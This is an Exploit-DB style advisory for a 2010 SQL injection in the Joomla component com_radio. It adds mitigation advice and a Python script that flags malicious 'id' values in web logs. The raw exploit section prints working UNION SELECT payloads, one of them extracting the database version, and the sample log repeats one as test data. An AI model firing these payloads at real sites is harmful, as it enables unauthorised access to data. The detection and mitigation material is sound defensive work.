Vendor: N/A
By: DevilZ TM
CVSS: 7,5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Joomla Component com_radio SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_radio. The 'id' parameter of the component's 'exibi_descricao' task is vulnerable: an attacker can supply SQL in that parameter and have it injected into the query the application runs, manipulating that query with arbitrary SQL code. Successful exploitation may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to connect to the database with a least-privileged account.
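
The input validation recommended above, as an added example (not code from the advisory or from the component): a strict allow-list for 'id', applied to web-server access logs to find com_radio requests that would fail it. It assumes that a legitimate 'id' is a non-negative integer and that logs are in Apache combined format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate id is a short, non-negative decimal integer.
ID_RE = re.compile(r"[0-9]{1,10}")
# Request line inside an Apache combined-format entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (.+?) HTTP/[0-9.]+"')


def is_valid_id(value):
    """Allow-list check: the whole value must be ASCII digits, nothing else."""
    return ID_RE.fullmatch(value) is not None


def suspicious_radio_requests(log_lines):
    """Return (line_number, id_value) for com_radio exibi_descricao
    requests carrying an id that fails the allow-list."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        # parse_qs percent-decodes values and keeps repeated parameters,
        # so a second, hidden id= value is checked as well.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_radio" not in params.get("option", []):
            continue
        if "exibi_descricao" not in params.get("task", []):
            continue
        for value in params.get("id", []):
            if not is_valid_id(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not real traffic); line 2 carries the
# advisory's own example string, URL-encoded.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Mar/2010:10:00:01 +0000] "GET /index.php?option=com_radio&task=exibi_descricao&id=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [29/Mar/2010:10:00:09 +0000] "GET /index.php?option=com_radio&task=exibi_descricao&id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8-- HTTP/1.1" 200 4811',
    '192.0.2.10 - - [29/Mar/2010:10:00:15 +0000] "GET /index.php?option=com_content&view=article&id=5:news HTTP/1.1" 200 9034',
]

if __name__ == "__main__":
    for number, value in suspicious_radio_requests(SAMPLE_LOG):
        print(f"line {number}: rejected id {value!r}")
```

The same `is_valid_id` check belongs in front of the query itself; log review only shows which requests would have been rejected.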

Exploit-DB raw data:

# Title : Joomla Component com_radio SQL Injection Vulnerability
# Author: DevilZ TM
# Date  : 2010-03-29

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_radio SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
[~] Contact   : D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=[SQL]
 
[~] ExploiT         :
 
-1 UNION SELECT 1,2,3,4,5,6,7,8--
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--

[~] Demo            :

http://server/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,version(),5,6,7,8--

  
[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~]#########################################   FinisH :D   #############################################[~]